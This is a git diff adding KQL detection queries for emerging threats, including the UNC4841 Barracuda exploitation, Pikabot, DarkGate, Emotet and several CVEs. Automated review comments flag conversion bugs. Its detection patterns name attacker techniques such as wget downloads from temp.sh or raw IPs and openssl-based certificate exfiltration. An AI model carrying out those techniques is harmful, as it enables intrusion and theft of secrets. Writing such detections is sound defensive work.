+// Title: Suspicious RazerInstaller Explorer Subprocess
+// Author: Florian Roth (Nextron Systems), Maxime Thiebaut
+// Date: 2021-08-23
+// Level: high
+// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats
+// False Positives:
+// - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
new file mode 100644
index 00000000..5624c144
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
+// Author: Sittikorn S
+// Date: 2020-05-31
+// Level: medium
+// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"
\ No newline at end of file
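Review bot: The MSDT rule's only predicate, `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"`, is a case-insensitive equality test, so the trailing `*` is compared literally and the rule cannot fire on the real key. The Sigma source expresses a wildcard; the KQL equivalent is `| where RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt"`. The query also carries no `ActionType` filter, so despite the "Set Value" title it will match any registry event on that key, which is worth a comment if intentional. The RazerInstaller hunk on the same line reads correctly.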
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
new file mode 100644
index 00000000..2ba11c77
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
new file mode 100644
index 00000000..efd5b053
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
new file mode 100644
index 00000000..2e8e2ebb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
new file mode 100644
index 00000000..a858f485
--- /dev/null
+++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
@@ -0,0 +1,14 @@
+// Title: Potential Pikabot Discovery Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
+The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
+
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
new file mode 100644
index 00000000..8f185e95
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ")
\ No newline at end of file
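Review bot: The Pikabot rule's description continuation, `+The malware Pikabot has been seen to use this technique ...`, is written without the `//` prefix, so the file carries a bare prose line ahead of `DeviceProcessEvents` that the KQL parser will reject — the hunk header's 14-line count confirms it is its own line. The same defect is in cve_2021_26858_exchange_exploitation (two lines), darkgate_autoit3_exe_execution_parameters (two lines), emotet_loader_execution_via_lnk_file and exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process; each continuation needs a `// ` prefix, presumably emitted by the converter where it wraps multi-line Sigma descriptions rather than patched by hand. Separately, `InitiatingProcessParentFileName` holds a bare file name in this table, so `endswith "\\rundll32.exe"` can never match and that parent branch is dead; `InitiatingProcessParentFileName =~ "rundll32.exe"` keeps the intent — verify against the schema. Every generated file also ends without a trailing newline, which the converter could add.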
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
new file mode 100644
index 00000000..4e802ac4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-29
+// Level: critical
+// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
new file mode 100644
index 00000000..e0ff3f49
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
@@ -0,0 +1,13 @@
+// Title: CVE-2021-26858 Exchange Exploitation
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
+creation of non-standard files on disk by Exchange Server’s Unified Messaging service
+which could indicate dropping web shells or other malicious content
+
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql
new file mode 100644
index 00000000..c3adf9a9
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2021-44077 POC Default Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2021-44077, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
new file mode 100644
index 00000000..43867a5b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2022-24527 Microsoft Connected Cache LPE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
new file mode 100644
index 00000000..f5e23c68
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
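Review bot: The exclusion `not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))` is unlikely to suppress the SYSTEM-initiated writes it is meant to: in DeviceFileEvents the `RequestAccount*` columns describe the remote requester of a file operation and carry the user part only, with the domain ("NT AUTHORITY") in a separate column, so a user-name column would not contain "AUTHORI" for local activity. If the intent is the Sigma `User` filter on the local initiating account, `not((InitiatingProcessAccountDomain contains "AUTHORI" or InitiatingProcessAccountDomain contains "AUTORI"))` is the closer mapping — please verify against the table schema before changing it. Without the fix the rule fires on every legitimate write of that module file by the service itself.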
@@ -0,0 +1,13 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
new file mode 100644
index 00000000..97fc683c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
@@ -0,0 +1,11 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: medium
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
new file mode 100644
index 00000000..6e14b751
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-38331, detection.emerging-threats
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
new file mode 100644
index 00000000..58192dc0
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+// MITRE Tactic: Execution
+// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
new file mode 100644
index 00000000..9c44e5c4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: low
+// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-40477, detection.emerging-threats
+// False Positives:
+// - Legitimate extraction of multipart or recovery volumes ZIP files
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
new file mode 100644
index 00000000..a24e7133
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
@@ -0,0 +1,15 @@
+// Title: DarkGate - Autoit3.EXE Execution Parameters
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: high
+// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+command-and-control server.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
new file mode 100644
index 00000000..3f1f3a5c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
@@ -0,0 +1,12 @@
+// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory
+// Author: Tomasz Dyduch, Josh Nickels
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely legitimate usage of AutoIT in temp folders.
+
+DeviceFileEvents
+| where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql
new file mode 100644
index 00000000..06adb4ca
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql
@@ -0,0 +1,12 @@
+// Title: DarkSide Ransomware Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: critical
+// Description: Detects DarkSide Ransomware and helpers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+// - UAC bypass method used by other malware
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..3b087bd4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Diamond Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..62380147
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Diamond Sleet APT Process Activity Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects process creation activity indicators related to Diamond Sleet APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
new file mode 100644
index 00000000..64ec2a68
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
@@ -0,0 +1,10 @@
+// Title: Droppers Exploiting CVE-2017-11882
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-23
+// Level: critical
+// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
new file mode 100644
index 00000000..e6e47dcf
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
@@ -0,0 +1,12 @@
+// Title: Elise Backdoor Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-01-31
+// Level: critical
+// Description: Detects Elise backdoor activity used by APT32
+// MITRE Tactic: Execution
+// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
new file mode 100644
index 00000000..7fba0278
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
@@ -0,0 +1,14 @@
+// Title: Emotet Loader Execution Via .LNK File
+// Author: @kostastsale
+// Date: 2022-04-22
+// Level: high
+// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
+The ".lnk" file was delivered via phishing campaign.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
new file mode 100644
index 00000000..f24372fd
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
@@ -0,0 +1,12 @@
+// Title: Exploit for CVE-2017-0261
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: medium
+// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats
+// False Positives:
+// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
+
+DeviceProcessEvents
+| where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
new file mode 100644
index 00000000..cc1e35fb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2017-8759
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-09-15
+// Level: critical
+// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats
+
+DeviceProcessEvents
